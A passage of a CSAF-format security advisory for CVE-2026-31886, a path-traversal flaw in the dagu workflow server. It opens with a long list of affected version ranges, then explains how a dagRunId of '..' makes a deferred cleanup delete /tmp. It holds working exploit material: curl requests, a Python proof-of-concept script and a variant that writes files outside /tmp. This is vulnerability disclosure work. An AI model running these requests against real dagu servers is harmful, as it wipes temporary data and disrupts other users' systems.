                                    "product_id": "CSAFPID-5731049"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.0",
                                "product": {
                                    "name": "vers:unknown/v1.3.0",
                                    "product_id": "CSAFPID-5700964"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.1",
                                "product": {
                                    "name": "vers:unknown/v1.3.1",
                                    "product_id": "CSAFPID-5700965"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.10",
                                "product": {
                                    "name": "vers:unknown/v1.3.10",
                                    "product_id": "CSAFPID-5700966"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.11",
                                "product": {
                                    "name": "vers:unknown/v1.3.11",
                                    "product_id": "CSAFPID-5700967"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.12",
                                "product": {
                                    "name": "vers:unknown/v1.3.12",
                                    "product_id": "CSAFPID-5700968"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.13",
                                "product": {
                                    "name": "vers:unknown/v1.3.13",
                                    "product_id": "CSAFPID-5700969"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.14",
                                "product": {
                                    "name": "vers:unknown/v1.3.14",
                                    "product_id": "CSAFPID-5700970"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.15",
                                "product": {
                                    "name": "vers:unknown/v1.3.15",
                                    "product_id": "CSAFPID-5700971"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.16",
                                "product": {
                                    "name": "vers:unknown/v1.3.16",
                                    "product_id": "CSAFPID-5700972"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.17",
                                "product": {
                                    "name": "vers:unknown/v1.3.17",
                                    "product_id": "CSAFPID-5700973"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.18",
                                "product": {
                                    "name": "vers:unknown/v1.3.18",
                                    "product_id": "CSAFPID-5700974"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.19",
                                "product": {
                                    "name": "vers:unknown/v1.3.19",
                                    "product_id": "CSAFPID-5700975"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.2",
                                "product": {
                                    "name": "vers:unknown/v1.3.2",
                                    "product_id": "CSAFPID-5700976"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.20",
                                "product": {
                                    "name": "vers:unknown/v1.3.20",
                                    "product_id": "CSAFPID-5700977"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.21",
                                "product": {
                                    "name": "vers:unknown/v1.3.21",
                                    "product_id": "CSAFPID-5700978"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.3",
                                "product": {
                                    "name": "vers:unknown/v1.3.3",
                                    "product_id": "CSAFPID-5700979"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.4",
                                "product": {
                                    "name": "vers:unknown/v1.3.4",
                                    "product_id": "CSAFPID-5700980"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.5",
                                "product": {
                                    "name": "vers:unknown/v1.3.5",
                                    "product_id": "CSAFPID-5700981"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.6",
                                "product": {
                                    "name": "vers:unknown/v1.3.6",
                                    "product_id": "CSAFPID-5700982"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.7",
                                "product": {
                                    "name": "vers:unknown/v1.3.7",
                                    "product_id": "CSAFPID-5700983"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.3.8",
                                "product": {
                                    "name": "vers:unknown/v1.3.8",
                                    "product_id": "CSAFPID-5700984"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.30.0",
                                "product": {
                                    "name": "vers:unknown/v1.30.0",
                                    "product_id": "CSAFPID-5731050"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.30.1",
                                "product": {
                                    "name": "vers:unknown/v1.30.1",
                                    "product_id": "CSAFPID-5731051"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.30.2",
                                "product": {
                                    "name": "vers:unknown/v1.30.2",
                                    "product_id": "CSAFPID-5731052"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.30.3",
                                "product": {
                                    "name": "vers:unknown/v1.30.3",
                                    "product_id": "CSAFPID-5731053"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.4.0",
                                "product": {
                                    "name": "vers:unknown/v1.4.0",
                                    "product_id": "CSAFPID-5700985"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.4.1",
                                "product": {
                                    "name": "vers:unknown/v1.4.1",
                                    "product_id": "CSAFPID-5700986"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.4.2",
                                "product": {
                                    "name": "vers:unknown/v1.4.2",
                                    "product_id": "CSAFPID-5700987"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.4.3",
                                "product": {
                                    "name": "vers:unknown/v1.4.3",
                                    "product_id": "CSAFPID-5700988"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.4.4",
                                "product": {
                                    "name": "vers:unknown/v1.4.4",
                                    "product_id": "CSAFPID-5700989"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.0",
                                "product": {
                                    "name": "vers:unknown/v1.5.0",
                                    "product_id": "CSAFPID-5700990"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.1",
                                "product": {
                                    "name": "vers:unknown/v1.5.1",
                                    "product_id": "CSAFPID-5700991"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.2",
                                "product": {
                                    "name": "vers:unknown/v1.5.2",
                                    "product_id": "CSAFPID-5700992"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.3",
                                "product": {
                                    "name": "vers:unknown/v1.5.3",
                                    "product_id": "CSAFPID-5700993"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.4",
                                "product": {
                                    "name": "vers:unknown/v1.5.4",
                                    "product_id": "CSAFPID-5700994"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.5",
                                "product": {
                                    "name": "vers:unknown/v1.5.5",
                                    "product_id": "CSAFPID-5700995"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.6",
                                "product": {
                                    "name": "vers:unknown/v1.5.6",
                                    "product_id": "CSAFPID-5700996"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.5.7",
                                "product": {
                                    "name": "vers:unknown/v1.5.7",
                                    "product_id": "CSAFPID-5700997"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.0",
                                "product": {
                                    "name": "vers:unknown/v1.6.0",
                                    "product_id": "CSAFPID-5700998"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.1",
                                "product": {
                                    "name": "vers:unknown/v1.6.1",
                                    "product_id": "CSAFPID-5700999"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.2",
                                "product": {
                                    "name": "vers:unknown/v1.6.2",
                                    "product_id": "CSAFPID-5701000"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.3",
                                "product": {
                                    "name": "vers:unknown/v1.6.3",
                                    "product_id": "CSAFPID-5701001"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.4",
                                "product": {
                                    "name": "vers:unknown/v1.6.4",
                                    "product_id": "CSAFPID-5701002"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.5",
                                "product": {
                                    "name": "vers:unknown/v1.6.5",
                                    "product_id": "CSAFPID-5701003"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.6",
                                "product": {
                                    "name": "vers:unknown/v1.6.6",
                                    "product_id": "CSAFPID-5701004"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.7",
                                "product": {
                                    "name": "vers:unknown/v1.6.7",
                                    "product_id": "CSAFPID-5701005"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.8",
                                "product": {
                                    "name": "vers:unknown/v1.6.8",
                                    "product_id": "CSAFPID-5701006"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.6.9",
                                "product": {
                                    "name": "vers:unknown/v1.6.9",
                                    "product_id": "CSAFPID-5701007"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.10",
                                "product": {
                                    "name": "vers:unknown/v1.7.10",
                                    "product_id": "CSAFPID-5701008"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.11",
                                "product": {
                                    "name": "vers:unknown/v1.7.11",
                                    "product_id": "CSAFPID-5701009"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.3",
                                "product": {
                                    "name": "vers:unknown/v1.7.3",
                                    "product_id": "CSAFPID-5701010"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.4",
                                "product": {
                                    "name": "vers:unknown/v1.7.4",
                                    "product_id": "CSAFPID-5701011"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.5",
                                "product": {
                                    "name": "vers:unknown/v1.7.5",
                                    "product_id": "CSAFPID-5701012"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.6",
                                "product": {
                                    "name": "vers:unknown/v1.7.6",
                                    "product_id": "CSAFPID-5701013"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.7",
                                "product": {
                                    "name": "vers:unknown/v1.7.7",
                                    "product_id": "CSAFPID-5701014"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.8",
                                "product": {
                                    "name": "vers:unknown/v1.7.8",
                                    "product_id": "CSAFPID-5701015"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.7.9",
                                "product": {
                                    "name": "vers:unknown/v1.7.9",
                                    "product_id": "CSAFPID-5701016"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.0",
                                "product": {
                                    "name": "vers:unknown/v1.8.0",
                                    "product_id": "CSAFPID-5701017"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.1",
                                "product": {
                                    "name": "vers:unknown/v1.8.1",
                                    "product_id": "CSAFPID-5701018"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.2",
                                "product": {
                                    "name": "vers:unknown/v1.8.2",
                                    "product_id": "CSAFPID-5701019"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.3",
                                "product": {
                                    "name": "vers:unknown/v1.8.3",
                                    "product_id": "CSAFPID-5701020"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.4",
                                "product": {
                                    "name": "vers:unknown/v1.8.4",
                                    "product_id": "CSAFPID-5701021"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.5",
                                "product": {
                                    "name": "vers:unknown/v1.8.5",
                                    "product_id": "CSAFPID-5701022"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.6",
                                "product": {
                                    "name": "vers:unknown/v1.8.6",
                                    "product_id": "CSAFPID-5701023"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.7",
                                "product": {
                                    "name": "vers:unknown/v1.8.7",
                                    "product_id": "CSAFPID-5701024"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.8.8",
                                "product": {
                                    "name": "vers:unknown/v1.8.8",
                                    "product_id": "CSAFPID-5701025"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.9.0",
                                "product": {
                                    "name": "vers:unknown/v1.9.0",
                                    "product_id": "CSAFPID-5701026"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.9.1",
                                "product": {
                                    "name": "vers:unknown/v1.9.1",
                                    "product_id": "CSAFPID-5701027"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.9.2",
                                "product": {
                                    "name": "vers:unknown/v1.9.2",
                                    "product_id": "CSAFPID-5701028"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.9.3",
                                "product": {
                                    "name": "vers:unknown/v1.9.3",
                                    "product_id": "CSAFPID-5701029"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.9.4",
                                "product": {
                                    "name": "vers:unknown/v1.9.4",
                                    "product_id": "CSAFPID-5701030"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0",
                                "product": {
                                    "name": "vers:unknown/v2.0.0",
                                    "product_id": "CSAFPID-5910285"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.1",
                                "product": {
                                    "name": "vers:unknown/v2.0.1",
                                    "product_id": "CSAFPID-5910286"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.2",
                                "product": {
                                    "name": "vers:unknown/v2.0.2",
                                    "product_id": "CSAFPID-5910287"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.3",
                                "product": {
                                    "name": "vers:unknown/v2.0.3",
                                    "product_id": "CSAFPID-5910288"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.4",
                                "product": {
                                    "name": "vers:unknown/v2.0.4",
                                    "product_id": "CSAFPID-5910289"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.5",
                                "product": {
                                    "name": "vers:unknown/v2.0.5",
                                    "product_id": "CSAFPID-5910290"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.0",
                                "product": {
                                    "name": "vers:unknown/v2.1.0",
                                    "product_id": "CSAFPID-5910291"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.1",
                                "product": {
                                    "name": "vers:unknown/v2.1.1",
                                    "product_id": "CSAFPID-5910292"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.2",
                                "product": {
                                    "name": "vers:unknown/v2.1.2",
                                    "product_id": "CSAFPID-5910293"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.3",
                                "product": {
                                    "name": "vers:unknown/v2.1.3",
                                    "product_id": "CSAFPID-5910294"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.0",
                                "product": {
                                    "name": "vers:unknown/v2.2.0",
                                    "product_id": "CSAFPID-5910295"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.1",
                                "product": {
                                    "name": "vers:unknown/v2.2.1",
                                    "product_id": "CSAFPID-5910296"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.2",
                                "product": {
                                    "name": "vers:unknown/v2.2.2",
                                    "product_id": "CSAFPID-5910297"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.3",
                                "product": {
                                    "name": "vers:unknown/v2.2.3",
                                    "product_id": "CSAFPID-5910298"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "dagu"
                    }
                ],
                "category": "vendor",
                "name": "dagu-org"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-31886",
            "cwe": {
                "id": "CWE-22",
                "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp/<name>/<id>` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. 
Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n    _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n    return nil, err\n}\ndefer cleanup()  // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation  bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. 
The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"operator\",\"password\":\"<password>\"}' \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\n    \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n    \"dagRunId\": \"..\"\n  }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. 
Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n  - name: s\\n    command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n   ```\n   tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n           = filepath.Clean(\"/tmp/inline/..\")\n           = \"/tmp\"\n   ```\n   (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n   ```go\n   cleanup = func() { os.RemoveAll(\"/tmp\") }\n   ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). 
Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs  (executeDAGRunFromSpec)\n          POST /api/v1/dag-runs/enqueue  (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n  tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n  python3 poc.py --url http://localhost:8080\n  python3 poc.py --url http://localhost:8080 --username admin --password secret\n  python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n    payload = json.dumps({\"username\": username, \"password\": password}).encode()\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/auth/login\",\n        data=payload,\n        headers={\"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=10) as resp:\n            data = json.loads(resp.read())\n            token = data.get(\"token\") or data.get(\"accessToken\")\n            if not token:\n                print(f\"Login response did 
not contain a token: {data}\")\n                sys.exit(1)\n            return token\n    except urllib.error.HTTPError as e:\n        print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n        sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n    body = json.dumps({\n        \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n        \"dagRunId\": traversal,\n    }).encode()\n    headers = {\"Content-Type\": \"application/json\"}\n    if token:\n        headers[\"Authorization\"] = f\"Bearer {token}\"\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/dag-runs\",\n        data=body,\n        headers=headers,\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=15) as resp:\n            return resp.status, json.loads(resp.read())\n    except urllib.error.HTTPError as e:\n        return e.code, e.read().decode()\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n    parser.add_argument(\"--token\", default=\"\")\n    parser.add_argument(\"--username\", default=\"admin\")\n    parser.add_argument(\"--password\", default=\"\")\n    parser.add_argument(\"--traversal\", default=\"..\",\n                        help=\"Value for dagRunId (default: '..')\")\n    args = parser.parse_args()\n\n    base_url = args.url.rstrip(\"/\")\n    traversal = args.traversal\n\n    import posixpath\n    name_hint = \"inline\"\n    expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n    print(f\"Target server : {base_url}\")\n    print(f\"dagRunId value: {repr(traversal)}\")\n    print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n    print(f\"os.RemoveAll will target: '{expected_dir}'\")\n    print()\n\n    token = args.token\n    if not token and args.password:\n        print(\"Obtaining JWT token...\")\n        token = login(base_url, args.username, 
args.password)\n        print(f\"Token obtained: {token[:30]}...\")\n    elif not token:\n        print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n    print()\n\n    tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n    if tmp_before is not None:\n        print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n    print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n    status, body = send_exploit(base_url, token, traversal)\n    print(f\"HTTP {status}: {body}\")\n    print()\n\n    if status not in (200, 201):\n        print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n        sys.exit(1)\n\n    time.sleep(0.5)\n\n    if tmp_before is not None:\n        tmp_after = os.path.exists(expected_dir)\n        print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n        if not tmp_after:\n            print()\n            print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n        else:\n            print()\n            print(\"Directory still exists. 
If running against a remote server, check\")\n            print(f\"on the server host whether '{expected_dir}' was modified.\")\n    else:\n        print(f\"Cannot verify filesystem state from this host.\")\n        print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n  | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n  mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after:  $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `<nameHint>.yaml` before the cleanup removes that directory:\n\n```json\n{\n  \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n  \"name\": \"payload\",\n  \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls 
